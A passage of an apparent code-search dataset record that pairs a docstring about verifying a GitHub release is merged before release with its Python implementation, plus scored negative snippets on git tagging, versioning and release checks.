self.pull_requests_table.c.pr_src_id==pr_dict['id']).values(pr))\n logging.info(\"Updated tuple in the pull_requests table with existing pr_src_id: {}\".format(\n pr_dict['id']))\n self.pr_id_inc = pr_dict['pkey']\n\n else:\n logging.info(\"PR does not need to be inserted. 
Fetching its id from DB\")\n pr_id_sql = s.sql.text(\"\"\"\n SELECT pull_request_id FROM pull_requests\n WHERE pr_src_id={}\n \"\"\".format(pr_dict['id']))\n\n self.pr_id_inc = int(pd.read_sql(pr_id_sql, self.db).iloc[0]['pull_request_id'])\n\n self.query_labels(pr_dict['labels'], self.pr_id_inc)\n self.query_pr_events(owner, repo, pr_dict['number'], self.pr_id_inc)\n self.query_pr_comments(owner, repo, pr_dict['number'], self.pr_id_inc)\n self.query_reviewers(pr_dict['requested_reviewers'], self.pr_id_inc)\n self.query_pr_meta(pr_dict['head'], pr_dict['base'], self.pr_id_inc)\n\n logging.info(f\"Inserted PR data for {owner}/{repo}\")\n self.results_counter += 1\n\n register_task_completion(self, entry_info, repo_id, 'pull_requests')", "def main():\n parser = argparse.ArgumentParser()\n group = parser.add_mutually_exclusive_group()\n group.add_argument(\"-v\",\n \"--verbose\",\n action=\"store_true\",\n help=\"Show verbose information\")\n group.add_argument(\"-q\",\n \"--quiet\",\n action=\"store_true\",\n help=\"Display less information\")\n parser.add_argument(\n 'category',\n help='Use the task you want to create like issue, pr, repo ',\n choices=[\"issue\", \"pr\", \"repo\"])\n parser.add_argument(\n 'action',\n help='Use the action to perform in the category.',\n choices=[\"create\", \"list\", \"edit\", \"delete\", \"close\", \"status\"])\n parser.add_argument(\"-t\",\n \"--title\",\n help=\"Title of issue or PR or name of repository\")\n parser.add_argument(\"-d\",\n \"--description\",\n help=\"Description of issue or PR or repo.\")\n parser.add_argument(\"-c\", \"--config\", help=\"Configuration file to use.\")\n parser.add_argument(\"-T\",\n \"--token\",\n help=\"Personal access token for github.\")\n parser.add_argument(\"-u\", \"--username\", help=\"Username of the user\")\n parser.add_argument(\"-a\",\n \"--assignee\",\n help=\"Filter by assignee or set assignee\")\n parser.add_argument(\"-b\",\n \"--base\",\n help=\"Filter by base branch the pull request are being merged to (ONLY FOR PR AND REPO)\")\n parser.add_argument(\"-A\", \"--author\", help=\"Filter by or set author\")\n parser.add_argument(\"-l\",\n \"--label\",\n help=\"Filter or set label separated by comma\")\n parser.add_argument(\"-L\", \"--limit\", help=\"Maximum number to fetch\")\n parser.add_argument(\"-s\", \"--state\", help=\"Filter by state\")\n parser.add_argument(\n \"-S\",\n \"--since\",\n help=\"List issues that have been updated at or after the given date.\"\n \" (You can also use value like 2 weeks ago)\")\n parser.add_argument(\"-r\",\n \"--repo\",\n help=\"Repository to perform action on.\")\n args = parser.parse_args()\n category_specific_action = handle_category_action(args)\n category_specific_action(args)\n return 0" ]
[ "0.70592564", "0.704382", "0.6956816", "0.6912854", "0.6759392", "0.6718217", "0.67178744", "0.66204125", "0.6516321", "0.6229428", "0.61973286", "0.61781627", "0.61508805", "0.614511", "0.614511", "0.61279315", "0.61080235", "0.60647273", "0.60609627", "0.603208", "0.6000777", "0.599494", "0.5949169", "0.59079295", "0.58725953", "0.5867142", "0.5843201", "0.58339804", "0.5820124", "0.5817992", "0.5784577", "0.57795835", "0.57634866", "0.5681204", "0.5676789", "0.5651529", "0.56498605", "0.5633753", "0.5621708", "0.558797", "0.55783206", "0.5567122", "0.5555468", "0.5535916", "0.5532292", "0.5502343", "0.548607", "0.5437993", "0.54367226", "0.5435886", "0.5432776", "0.54222167", "0.5418501", "0.54146767", "0.53980875", "0.5395783", "0.53827065", "0.5381524", "0.537763", "0.5376005", "0.5372408", "0.53702825", "0.53415114", "0.5335015", "0.5321057", "0.53121114", "0.53049576", "0.5294196", "0.5293648", "0.5288804", "0.5264719", "0.52521366", "0.5250274", "0.5247607", "0.5243057", "0.5235738", "0.5223884", "0.52190065", "0.521649", "0.52127516", "0.5208218", "0.52008396", "0.51978266", "0.5178376", "0.51769817", "0.51732993", "0.5168113", "0.5166213", "0.5163993", "0.5159005", "0.51572776", "0.5156764", "0.51480114", "0.5146914", "0.5142948", "0.51391387", "0.5134191", "0.5125854", "0.5123124", "0.5123065" ]
0.62417126
9
Verify that the release is actually ready to be released.
If the release is new (corresponds to a release branch), then we check that the release is merged into master.
If we cannot find the release branch, we assume that it is a hotfix and we verify that the major version number matches the latest release.
def check_release_status(self, release_name, release_branch): logger.debug('GitHubAPI.check_release_status args: {}; {}'.format( release_name, release_branch) ) release_version = extract_release_branch_version(release_name) release_branch_base = build_release_base_name(get_config()) # Assume that this is a new release # Check if the release branch is merged into master try: merge_status = self.compare( 'master', release_branch ).get('status') except requests.exceptions.HTTPError as e: logger.debug('HTTPError: {}'.format(e.message)) if not e.response.status_code == 404: raise e else: # can be one of diverged, ahead, behind, identical according to # http://stackoverflow.com/a/23969867 if merge_status in ['diverged', 'ahead']: raise Exception( 'Release must be merged into master before release') return # if the release branch does not exist, then we end up here, # Assume that it is a hotfix raw_version = self.latest_release().get('name', '') if raw_version.startswith(release_branch_base): raw_version = raw_version[len(release_branch_base):] version = extract_year_week_version(raw_version) logger.debug(version) if extract_year_week_version(release_version) != version: raise Exception( 'New release version does not match the current release, ' 'we expected a hotfix.' ) return
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def is_release_branch():\n diff_string_config_yml = run_command(\"git diff origin/master .circleci/config.yml\")\n if re.search(r'[+-][ ]+CONTENT_VERSION: \".*', diff_string_config_yml):\n return True\n\n return False", "def verify_tags(git_ref_target):\n latest_release = github_util.get_latest_release().get('name')\n latest_commit = run('git rev-list -n 1 {}'.format(latest_release)).stdout.rstrip(\"\\r\\n\")\n if not branch_check(latest_release, git_ref_target):\n print('Your branch does not contain the latest production code. \\n\\\n Please recreate it by branching off of release {}.'.format(latest_release))\n exit(1)\n else:\n print(\"Branch contains the latest production tag\")\n fork_point = run('git merge-base remotes/origin/master remotes/origin/{}'.format(git_ref_target))\n commits_since_fork = run('git rev-list --branches={} {}^..HEAD'.format(git_ref_target,\n fork_point.stdout.rstrip(\"\\r\\n\")))\n if latest_commit not in commits_since_fork.stdout:\n print('Your branch did not fork directly from the last production tag. \\n\\\n Please recreate it by branching off of release {}.'.format(latest_release))\n exit(1)\n else:\n print('Latest production tag is between the fork point and HEAD')", "def is_0_release(release: str) -> bool:\n if release == \"current_branch\":\n return False\n version = packaging.version.parse(release)\n return version < packaging.version.Version(\"1.0\")", "def version_check():\n try:\n with open('git.json', 'r') as fp:\n git_md = json.loads(fp.read())\n except IOError:\n # In the event that there is no git metadata, just print null values\n # twice.\n print \"null\"\n print \"null\"\n return\n\n if git_md['GitHub']:\n if git_md['GitHubUser'] is not None and git_md[\n 'GitHubRepo'] is not None:\n latest_release = json.loads(\n urllib2.urlopen(\n \"https://api.github.com/repos/%s/%s/releases/latest\" % (\n git_md['GitHubUser'], git_md['GitHubRepo'])).read())\n latest_tag = latest_release['tag_name']\n\n # Go through all of the tags to see if this commit matches a tag.\n tags = json.loads(\n urllib2.urlopen(\n \"https://api.github.com/repos/%s/%s/git/refs/tags\" % (\n git_md['GitHubUser'], git_md['GitHubRepo'])).read())\n\n current_tag = \"Unreleased\"\n for tag in tags:\n if tag['object']['sha'] == git_md['GitSHA']:\n current_tag = tag['ref'].split('/')[-1]\n\n print current_tag\n print latest_tag\n else:\n print \"MissingGitHubDetails\"\n print \"MissingGitHubDetails\"\n else:\n # In the event that there is a git file, but it doesn't indicate GitHub\n # then just print some stuff indicating that.\n print \"NonGitHub\"\n print \"NonGitHub\"", "def test_release_tag(self) -> None:\n self.assertEqual(\"v3.14.15\", release_tag())", "def test_master_versions(self):\n m = self.d.master(4242)\n r = self.d.release(79)\n v = m.versions\n\n self.assertEqual(len(v), 2)\n self.assertTrue(r in v)\n self.assertEqual(r.master, m)\n\n r2 = self.d.release(3329867)\n self.assertTrue(r2.master is None)", "def is_release():\n return VERSION[-1]", "def is_release(self):\n # version string: N.N.N.N is for release.\n return bool(re.match(r'^[\\d.]+$', self.version))", "def test_release_tag_for_dev_version(self) -> None:\n self.assertEqual(\"v42.12\", release_tag())", "def test_release(self):\n runCommand(\n [\"git\", \"checkout\", \"-b\", \"release-16.11111-9001\"], cwd=self.repo.path\n )\n\n somefile = self.repo.child(\"somefile\")\n somefile.setContent(b\"change\")\n\n runCommand([\"git\", \"add\", somefile.path, somefile.path], cwd=self.repo.path)\n runCommand([\"git\", 
\"commit\", \"-m\", \"some file\"], cwd=self.repo.path)\n\n logs = []\n\n with self.assertRaises(SystemExit) as e:\n CheckNewsfragmentScript(logs.append).main([self.repo.path])\n\n self.assertEqual(e.exception.args, (0,))\n self.assertEqual(logs[-1], \"Release branch with no newsfragments, all good.\")", "def test_release_update_available_MAJOR(self):\n NEXT = '%d.%d-%d' % (MAJOR + 1, 0, 0)\n self._uri({\n '%d.%d/maintained/%s/all/Packages.gz' % (MAJOR + 1, 0, NEXT): DATA,\n })\n next = self.u.release_update_available()\n self.assertEqual(NEXT, next)", "def test_pre_release(scraper, version_parts):\n\n new_version_parts = list(version_parts)\n if len(new_version_parts) > 4:\n new_version_parts[4] = int(new_version_parts[4]) + 1\n elif len(new_version_parts) > 3:\n new_version_parts.append(1)\n else:\n new_version_parts.extend(['a', 1])\n\n assert scraper.is_compatible_with(generate_version(new_version_parts)) is True", "def check_if_release_version_ok(\n past_releases: list[ReleaseInfo],\n current_release_version: str,\n) -> tuple[str, str | None]:\n previous_release_version = past_releases[0].release_version if past_releases else None\n if current_release_version == \"\":\n if previous_release_version:\n current_release_version = previous_release_version\n else:\n current_release_version = (datetime.today() + timedelta(days=5)).strftime(\"%Y.%m.%d\")\n if previous_release_version:\n if Version(current_release_version) < Version(previous_release_version):\n console.print(\n f\"[red]The release {current_release_version} must be not less than \"\n f\"{previous_release_version} - last release for the package[/]\"\n )\n raise Exception(\"Bad release version\")\n return current_release_version, previous_release_version", "def test_version_check_update_available(self):\n output = self.run_command(\"selfupdate --check bennr01:selfupdate_test_future\", exitcode=0)\n self.assertIn(\"Target: bennr01:selfupdate_test_future\", output)\n self.assertNotIn(\"Target: ywangd:master\", output)\n self.assertNotIn(\"Already at latest version\", output)\n self.assertIn(\"New version available\", output)\n self.assertNotIn(\"Error: \", output)", "def test_release_update_available_PATCH(self):\n NEXT = '%d.%d-%d' % (MAJOR, MINOR, PATCH + 1)\n self._uri({\n '%d.%d/maintained/%s/all/Packages.gz' % (MAJOR, MINOR, NEXT): DATA,\n })\n next = self.u.release_update_available()\n self.assertEqual(NEXT, next)", "def _is_version_uptodate(self):\n logging.info(\"Checking tesseract version\")\n cmd = '%s -v' % (self.binary)\n logging.info(cmd) \n try:\n ret_output = subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT)\n except CalledProcessError:\n # Could not run tesseract\n error(self.msgs['TS_MISSING'])\n\n ver_str = '0.0.0'\n for line in ret_output.splitlines():\n if 'tesseract' in line:\n ver_str = line.split(' ')[1]\n if ver_str.endswith('dev'): # Fix for version strings that end in 'dev'\n ver_str = ver_str[:-3]\n\n # Iterate through the version dots\n ver = [int(x) for x in ver_str.split('.')]\n req = [int(x) for x in self.required.split('.')]\n\n # Aargh, in windows 3.02.02 is reported as version 3.02 \n # SFKM\n if str(os.name) == 'nt':\n req = req[:2]\n\n version_good = False\n for i,num in enumerate(req):\n if len(ver) < i+1:\n # This minor version number is not present in tesseract, so it must be\n # lower than required. 
(3.02 < 3.02.01)\n break\n if ver[i]==num and len(ver) == i+1 and len(ver)==len(req):\n # 3.02.02 == 3.02.02\n version_good = True\n continue\n if ver[i]>num:\n # 4.0 > 3.02.02\n # 3.03.02 > 3.02.02\n version_good = True\n break\n if ver[i]<num:\n # 3.01.02 < 3.02.02\n break\n \n return version_good, ver_str", "def test_check_version_release(self):\n with self.assertLogs(\"dakara_feeder.version\", \"DEBUG\") as logger:\n with patch.multiple(\n \"dakara_feeder.version\", __version__=\"0.0.0\", __date__=\"1970-01-01\"\n ):\n check_version()\n\n # assert effect on logs\n self.assertListEqual(\n logger.output,\n [\"INFO:dakara_feeder.version:\" \"Dakara feeder 0.0.0 (1970-01-01)\"],\n )", "def test_release_update_available_MINOR(self):\n NEXT = '%d.%d-%d' % (MAJOR, MINOR + 1, 0)\n self._uri({\n '%d.%d/maintained/%s/all/Packages.gz' % (MAJOR, MINOR + 1, NEXT): DATA,\n })\n next = self.u.release_update_available()\n self.assertEqual(NEXT, next)", "def test_release_version_found(self, mock_git_info): # pylint: disable=invalid-name, unused-argument\n set_version_from_git_tag(self.project, self.logger)\n self.assertEqual(self.logger.info.call_count, 2)\n self.assertEqual(self.project.version, '1.2.3')", "def verify_branch(path, expected_branch=\"master\"):\n\n sys.stdout.write(\" - Verifying your branch is %s:\" % expected_branch)\n branch = run_in_component(path, ['git', 'rev-parse', '--abbrev-ref', 'HEAD'])\n branch = branch.strip()\n\n if branch == expected_branch:\n print(\" OKAY\")\n return\n\n print(\" FAILED\")\n\n raise GenericError(\"You must be on branch %s to release, you are on %s\" % (expected_branch, branch))", "def check_tag_version(self):\n import subprocess\n\n version = self.get_tag()\n version = version[version.rfind(\"-\") + 1 :]\n\n if robocorp_code.__version__ == version:\n sys.stderr.write(\"Version matches (%s) (exit(0))\\n\" % (version,))\n sys.exit(0)\n else:\n sys.stderr.write(\n \"Version does not match (found in sources: %s != tag: %s) (exit(1))\\n\"\n % (robocorp_code.__version__, version)\n )\n sys.exit(1)", "def test_release_update_available_CURRENT(self):\n NEXT = '%d.%d-%d' % (MAJOR, MINOR + 1, 0)\n self._ucr({\n 'repository/online/component/a': 'yes',\n 'repository/online/component/a/version': 'current',\n })\n self._uri({\n '%d.%d/maintained/%s/all/Packages.gz' % (MAJOR, MINOR + 1, NEXT): DATA,\n })\n self.assertRaises(U.RequiredComponentError, self.u.release_update_available, errorsto='exception')", "def test_release_version():\n pkg_vars = {}\n with open(VERSION_FILE) as f:\n exec(f.read(), pkg_vars) # nosec\n project_version = pkg_vars[\"__version__\"]\n assert (\n RELEASE_TAG == f\"v{project_version}\"\n ), \"RELEASE_TAG does not match the project version\"", "def checkCMSSWVersion(self, url = \"https://cmssdt.cern.ch/SDT/cgi-bin\", fileName = \"ReleasesXML?anytype=1\"):\n\n downloader = Downloader(url)\n goodRelease = False\n tagCollectorUrl = url + '/' + fileName\n\n try:\n result = downloader.config(fileName)\n except:\n common.logger.info(\"ERROR: Problem reading file of allowed CMSSW releases.\")\n\n try:\n events = pulldom.parseString(result)\n\n arch = None\n release = None\n relState = None\n for (event, node) in events:\n if event == pulldom.START_ELEMENT:\n if node.tagName == 'architecture':\n arch = node.attributes.getNamedItem('name').nodeValue\n if node.tagName == 'project':\n relState = node.attributes.getNamedItem('state').nodeValue\n if relState == 'Announced':\n release = node.attributes.getNamedItem('label').nodeValue\n if 
self.executable_arch == arch and self.version == release:\n goodRelease = True\n return goodRelease\n except:\n common.logger.info(\"Problems parsing file of allowed CMSSW releases.\")\n\n if not goodRelease and \\\n not self.cfg_params.get('CMSSW.allow_nonproductioncmssw',0)==\"1\" :\n msg = \"ERROR: %s on %s is not among supported releases listed at \\n %s .\" % (self.version, self.executable_arch, tagCollectorUrl)\n msg += \"\\n If you are sure of what you are doing you can set\"\n msg += \"\\n allow_NonProductionCMSSW = 1\"\n msg += \"\\n in the [CMSSW] section of crab.cfg.\"\n raise CrabException(msg)\n\n return goodRelease", "def test_release_update_available_NO(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/all/Packages.gz' % (MAJOR, MINOR, MAJOR, MINOR, PATCH): DATA,\n })\n next = self.u.release_update_available()\n self.assertEqual(None, next)", "def verify_support():\n ostype, majorrelease, _ = get_os_release_data()\n if ostype not in _supported_os:\n _logger.info('OS type %s is not supported.', ostype)\n return False\n if majorrelease not in _supported_release:\n _logger.info('OS %s %s is not supported', ostype, majorrelease)\n return False\n return True", "def test_dev_version_if_dirty(self, mock_git_info): # pylint: disable=invalid-name, unused-argument\n # Test `patch` part\n self.get_dev_version('patch')\n self.assertEqual(self.project.version, '1.2.4.dev')\n # Test `minor` part\n self.get_dev_version('minor')\n self.assertEqual(self.project.version, '1.3.0.dev')\n # Test `major` part\n self.get_dev_version('major')\n self.assertEqual(self.project.version, '2.0.0.dev')\n # Test incorrect part\n self.project.set_property('semver_git_tag_increment_part', 'incorrect')\n with self.assertRaises(BuildFailedException) as context:\n set_version_from_git_tag(self.project, self.logger)\n err_msg = str(context.exception)\n self.assertTrue(\n (\"Incorrect value for `semver_git_tag_increment_part` property. 
\"\n \"Has to be in (`major`, `minor`, `patch`), \"\n \"but `incorrect` passed.\") in err_msg)", "def is_dev_version(cls):\n\n # We initiate the command we have to run in order to\n # get the branch we are currently working with.\n command = \"git branch\"\n\n # We execute and get the command output.\n command_result = PyFunceble.helpers.Command(command).execute()\n\n for branch in command_result.split(\"\\n\"):\n # We loop through each line of the command output.\n\n if branch.startswith(\"*\") and (\"dev\" in branch or \"3.x\" in branch):\n # The current branch is `dev`.\n\n # We return True.\n return True\n\n # The current branch is not `dev`.\n\n # We return False.\n return False", "def test_version(self):\n version_instance = get_version('kolibri', __file__)\n self.assertIn(version_instance.major_version, kolibri.__version__)", "def check_release_exists(self, **kwargs):\n\n # List all available releases for logging and debugging purposes\n # These values are not used to actually check if the release is available\n logging.info(f\"Listing available releases since start date ({self.start_date}):\")\n for dt in pendulum.period(pendulum.instance(self.start_date), pendulum.today(\"UTC\")).range(\"years\"):\n response = requests.get(f\"https://api.crossref.org/snapshots/monthly/{dt.year}\")\n soup = BeautifulSoup(response.text)\n hrefs = soup.find_all(\"a\", href=True)\n for href in hrefs:\n logging.info(href[\"href\"])\n\n # Construct the release for the execution date and check if it exists.\n # The release for a given execution_date is added on the 5th day of the following month.\n # E.g. the 2020-05 release is added to the website on 2020-06-05.\n data_interval_start = kwargs[\"data_interval_start\"]\n exists = check_release_exists(data_interval_start, self.api_key)\n assert (\n exists\n ), f\"check_release_exists: release doesn't exist for month {data_interval_start.year}-{data_interval_start.month}, something is wrong and needs investigating.\"\n\n return True", "def test_dev_version_if_tagged_not_last_commit(self, mock_git_info): # pylint: disable=invalid-name, unused-argument\n # Test `patch` part\n self.get_dev_version('patch')\n self.assertEqual(self.project.version, '1.2.4.dev')\n # Test `minor` part\n self.get_dev_version('minor')\n self.assertEqual(self.project.version, '1.3.0.dev')\n # Test `major` part\n self.get_dev_version('major')\n self.assertEqual(self.project.version, '2.0.0.dev')\n # Test incorrect part\n self.project.set_property('semver_git_tag_increment_part', 'incorrect')\n with self.assertRaises(BuildFailedException) as context:\n set_version_from_git_tag(self.project, self.logger)\n err_msg = str(context.exception)\n self.assertTrue(\n (\"Incorrect value for `semver_git_tag_increment_part` property. 
\"\n \"Has to be in (`major`, `minor`, `patch`), \"\n \"but `incorrect` passed.\") in err_msg)", "def test_up_to_date(self):\n last_public_release = get_pypi_version()\n self.assertFalse(update_available(last_public_release))", "def release_status_check(release_id):\n logger.info(f\"Checking release status for {release_id}\")\n release = Release.objects.get(kf_id=release_id)\n release.status_check()", "def version_is_full_release(version_string):\n match = VERSION_REGEX.match(version_string)\n\n if match and match.groupdict()[\"modifier\"] == \"\":\n return True\n else:\n return False", "def test_finish_release_merge_conflict_tag(self):\n version_filename = 'VERSION'\n new_version = '1.1\\n'\n\n gitflow = GitFlow(self.repo).init()\n fmgr = FeatureBranchManager(gitflow)\n fmgr.finish('even')\n fake_commit(self.repo, 'Overwrite version',\n filename=version_filename,\n change=new_version)\n\n # verify that the tag does not yet exist\n # \"v\" comes form \"versiontag\" prefix in the gitflow config for the \"release\" fixture\n self.assertNotIn('v1.0', self.repo.tags)\n\n mgr = ReleaseBranchManager(gitflow)\n taginfo = dict(\n message='Tagging version 1.0',\n )\n self.assertRaises(MergeError,\n mgr.finish, '1.0', tagging_info=taginfo)\n\n # verify that the tag exists, even though there was a failed merge\n self.assertIn('v1.0', self.repo.tags)\n\n # resolve the conflict\n # this is in favor of the change on develop\n write_file(filename=version_filename,\n append=False,\n change=new_version)\n gitflow.git.add(version_filename)\n gitflow.git.commit('-F.git/MERGE_MSG')\n # the release branch is still here\n self.assertIn('rel/1.0',\n [b.name for b in self.repo.branches])\n # finish the release again\n # this should skip the tagging, since that part previously succeeded\n mgr.finish('1.0', tagging_info=taginfo)\n # now the release branch is gone\n self.assertNotIn('rel/1.0',\n [b.name for b in self.repo.branches])\n\n # verify that the tag still exists\n self.assertIn('v1.0', self.repo.tags)", "def should_deploy(request):\n\n data = json.loads(request.data.decode())\n\n if not data.get(\"pull_request\"):\n return False\n\n return data[\"action\"] == \"closed\" and data[\"pull_request\"][\"merged\"]", "def test_os_release(self):\n self.assertEqual(self.settings.OS_RELEASE, platform.release())", "def test_minor(self):\n self.assertEqual(1, self._version1.minor())\n self.assertEqual(3, self._version2.minor())", "def _checkUpdateNeeded(self):\n try:\n currentVersionLine = str(subprocess.run(['pacman', '-Q', '-i', self._name],\n stdout=subprocess.PIPE, stderr=subprocess.STDOUT, check=True).stdout)\n currentVersion = re.sub(r'.*Version\\s*: ([\\d|\\.]*)-.*', r'\\1', currentVersionLine).split('.')\n newVersion = self._version.split('.')\n for i in range(0, min(len(currentVersion), len(newVersion))):\n if currentVersion[i].isdigit():\n # TODO: test if new version is only digits too, two of them should be the same anyway\n if int(newVersion[i]) > int(currentVersion[i]):\n return True\n if int(newVersion[i]) < int(currentVersion[i]):\n return False\n return len(newVersion) > len(currentVersion)\n except subprocess.CalledProcessError:\n # Package not found: to be installed then\n return True", "def test_changeVersionsWithPrerelease(self):\n self._testVersionChanging(9, 2, 7, 38)", "def test_check_version_non_release(self):\n with self.assertLogs(\"dakara_feeder.version\", \"DEBUG\") as logger:\n with patch.multiple(\n \"dakara_feeder.version\", __version__=\"0.1.0-dev\", __date__=\"1970-01-01\"\n ):\n 
check_version()\n\n # assert effect on logs\n self.assertListEqual(\n logger.output,\n [\n \"INFO:dakara_feeder.version:\" \"Dakara feeder 0.1.0-dev (1970-01-01)\",\n \"WARNING:dakara_feeder.version:\"\n \"You are running a dev version, use it at your own risks!\",\n ],\n )", "def test_create_release(self):\n releases_before = self.hello_world_project.get_releases()\n latest_release = releases_before[0].tag_name\n count_before = len(releases_before)\n increased_release = \".\".join(\n [\n latest_release.rsplit(\".\", 1)[0],\n str(int(latest_release.rsplit(\".\", 1)[1]) + 1),\n ]\n )\n release = self.hello_world_project.create_release(\n tag=increased_release, name=\"test\", message=\"testing release\"\n )\n count_after = len(self.hello_world_project.get_releases())\n assert release.tag_name == increased_release\n assert release.title == \"test\"\n assert release.body == \"testing release\"\n assert count_before + 1 == count_after", "def test_major(self):\n self.assertEqual(\"0\", self._version1.major())\n self.assertEqual(\"1.2\", self._version2.major())", "def test_minor(scraper, version_parts):\n\n new_version_parts = list(version_parts)\n new_version_parts[1] = int(new_version_parts[1]) + 1\n\n assert scraper.is_compatible_with(generate_version(new_version_parts)) is True", "def check_release_exists(month: pendulum.DateTime, api_key: str) -> bool:\n\n url = make_snapshot_url(month)\n logging.info(f\"Checking if available release exists for {month.year}-{month.month}\")\n\n # Get API key: it is required to check the head now\n response = retry_session().head(url, headers={\"Crossref-Plus-API-Token\": f\"Bearer {api_key}\"})\n if response.status_code == 302:\n logging.info(f\"Snapshot exists at url: {url}, response code: {response.status_code}\")\n return True\n else:\n logging.info(\n f\"Snapshot does not exist at url: {url}, response code: {response.status_code}, \"\n f\"reason: {response.reason}\"\n )\n return False", "def update_os_release_file(**kwargs):\n\n LOGGER.info(\"Doing pre-flight checks\")\n\n releases_repo_url = OPENSTACK_REPOS + '/releases.git'\n releases_folder = kwargs['workdir'] + '/releases'\n\n oa_folder = kwargs['workdir'] + '/openstack-ansible'\n click.confirm((\"Are your sure your {} folder is properly \"\n \"checked out at the right version?\").format(oa_folder),\n abort=True)\n\n # Args validation\n if kwargs['branch'] not in VALID_CODE_NAMES:\n raise SystemExit(\"Invalid branch name {}\".format(kwargs['branch']))\n\n # Version validation\n if kwargs['version'] == \"auto\":\n fpth, version = get_oa_version(oa_folder)\n LOGGER.info(\"Version {} found in {}\".format(version, fpth))\n if version == \"master\":\n raise SystemExit(\"You should not release from a moving target\")\n else:\n version = kwargs['version']\n\n pre_release = (version.endswith(PRE_RELEASE_PREFIXES))\n\n if not pre_release:\n # For extra safety, ensure it's semver.\n try:\n semver_res = semver.parse(version)\n except Exception as exc:\n raise SystemExit(exc)\n major_version = semver_res['major']\n else:\n major_version = int(version.split(\".\")[0])\n\n if major_version != VALID_CODE_NAMES[kwargs['branch']]:\n raise SystemExit(\"Not a valid number for this series\")\n # Args validation done.\n\n yaml = YAML()\n oa = Repo(oa_folder)\n head_commit = oa.head.commit\n LOGGER.info(\"OpenStack-Ansible current SHA {}\".format(head_commit))\n if os.path.lexists(releases_folder):\n click.confirm('Deleting ' + releases_folder + '. 
OK?', abort=True)\n shutil.rmtree(releases_folder)\n releases_repo = Repo.clone_from(\n url=releases_repo_url,\n to_path=releases_folder,\n branch=\"master\")\n\n LOGGER.info(\"Reading ansible-role-requirements\")\n arr, _, _ = load_yaml(kwargs['workdir'] + ARR_PATH)\n\n LOGGER.info(\"Reading releases deliverable for the given branch\")\n deliverable_file_path = ('deliverables/' + kwargs['branch'] +\n '/openstack-ansible.yaml')\n deliverable_file = releases_folder + \"/\" + deliverable_file_path\n deliverable, ind, bsi = load_yaml(deliverable_file)\n\n # if no releases yet (start of cycle), prepare releases, as a list\n if not deliverable.get('releases'):\n deliverable['releases'] = []\n\n # Ensure the new release is last\n deliverable['releases'].append(\n {'version': \"{}\".format(version),\n 'projects': []}\n )\n\n # Now we can build in the order we want and still keep std dicts\n deliverable['releases'][-1]['projects'].append(\n {'repo': 'openstack/openstack-ansible',\n 'hash': \"{}\".format(head_commit)}\n )\n\n # Select OpenStack Projects and rename them for releases.\n # Keep their SHA\n regex = re.compile('^' + OPENSTACK_REPOS + '/.*')\n for role in arr:\n if regex.match(role['src']):\n deliverable['releases'][-1]['projects'].append(\n {'repo': urlparse(role['src']).path.lstrip('/'),\n 'hash': role['version']}\n )\n\n with open(deliverable_file, 'w') as df_h:\n yaml.explicit_start = True\n yaml.block_seq_indent = bsi\n yaml.indent = ind\n yaml.dump(deliverable, df_h)\n LOGGER.info(\"Patched!\")\n\n if kwargs['commit']:\n message = \"\"\"Release OpenStack-Ansible {}/{}\n\n \"\"\".format(kwargs['branch'], version)\n releases_repo.index.add([deliverable_file_path])\n releases_repo.index.commit(message)", "def test_request_estable_version(self):\n current_stable_version = get_stable_version()\n self.assertIsNotNone(current_stable_version)", "def check_build(self, bld_num):\n # QQQ In future this should be replaced with a query to the\n # build database\n bld_dir = os.path.join(self.ver_dir, str(bld_num))\n for plat in self.plats.keys():\n if self.plats[plat]:\n # QQQ Assumes format of filename unique to couchbase-server\n files = glob.glob(\"{}/couchbase-server-enterprise?{}*{}*\".format(\n bld_dir, self.version, plat\n ))\n files = [x for x in files if not (x.endswith(\".md5\") or x.endswith(\".sha256\"))]\n if len(files) == 0:\n print (\"Platform {} is missing\".format(plat))\n return False\n return True", "def is_valid_version(self):\n pass", "def _check_version(self, project, targetdir):\r\n versionfile = os.path.join(targetdir, 'project.version')\r\n if (os.path.exists(versionfile)):\r\n file_ = open(versionfile, \"r\")\r\n projectname = file_.read().strip()\r\n file_.close()\r\n if (projectname == project.objectname):\r\n return True\r\n return False", "def check_git_support():\n proc = Popen(['git', '--version'], shell=True, stdout=PIPE,)\n msg, _ = proc.communicate()\n msg = msg.decode('utf-8')\n if \"git version\" in msg:\n return True\n return False", "def test_undefined_semver(self):\n v1 = versions.Version(version='1.2.3', name='foo')\n expected = None\n\n self.assertEqual(v1.build, expected)", "def check_update():\n try:\n raw_version = urllib.urlopen(VERSIONFILE)\n except IOError as e:\n print UPDATE_FAIL + \"can't fetch version file: \" + str(e)\n else:\n if raw_version.getcode() == 200:\n remote_version = raw_version.read().rstrip()\n if remote_version != VERSION:\n print(UPDATE_WARN + \"version \" + remote_version + \" is available, you have version \"\n + VERSION + 
\"\\n\\t\" + \"to update run: \" + UPDATECOMMAND)\n else:\n print UPDATE_FAIL + \"can't fetch version file\"", "def check(self):\n current = self._get_current()\n # There is no version, so don't attempt to upgrade\n if current[-1]:\n return False\n\n highest = self._get_highest_version()\n return highest > current", "def checkVersion(self):\n try:\n respInfo = self._reqSession.get(self._host + \"/static/pythonSDKVersion.txt\")\n if respInfo.status_code != 200 or len(respInfo.text) > 20:\n return\n latestVersion = respInfo.text.strip()\n import eventregistry._version as _version\n currentVersion = _version.__version__\n for (latest, current) in zip(latestVersion.split(\".\"), currentVersion.split(\".\")):\n if int(latest) > int(current):\n logger.info(\"==============\\nYour version of the module is outdated, please update to the latest version\")\n logger.info(\"Your version is %s while the latest is %s\", currentVersion, latestVersion)\n logger.info(\"Update by calling: pip install --upgrade eventregistry\\n==============\")\n return\n # in case the server mistakenly has a lower version that the user has, don't report an error\n elif int(latest) < int(current):\n return\n except:\n pass", "def validate_commit(ctx, sha, **_):\n\n gh = ctx.obj.github\n ci_provider = ctx.obj.ci_provider\n\n sha = sha or (ci_provider.sha if ci_provider else None)\n\n def _pre_issue():\n log.echo('Commit references an issue...', break_line=False)\n\n def _post_issue():\n log.checkmark()\n\n def _pre_label():\n log.echo('Issue is labeled with a release label...', break_line=False)\n\n def _post_label():\n log.checkmark()\n\n log.echo('Validating commit', add=True)\n\n try:\n gh.validate_commit(sha=sha,\n hooks={\n 'pre_issue': _pre_issue,\n 'pre_label': _pre_label,\n 'post_issue': _post_issue,\n 'post_label': _post_label\n })\n except exceptions.ReleaseValidationFailedException as e:\n log.xmark()\n log.sub()\n tb = sys.exc_info()[2]\n 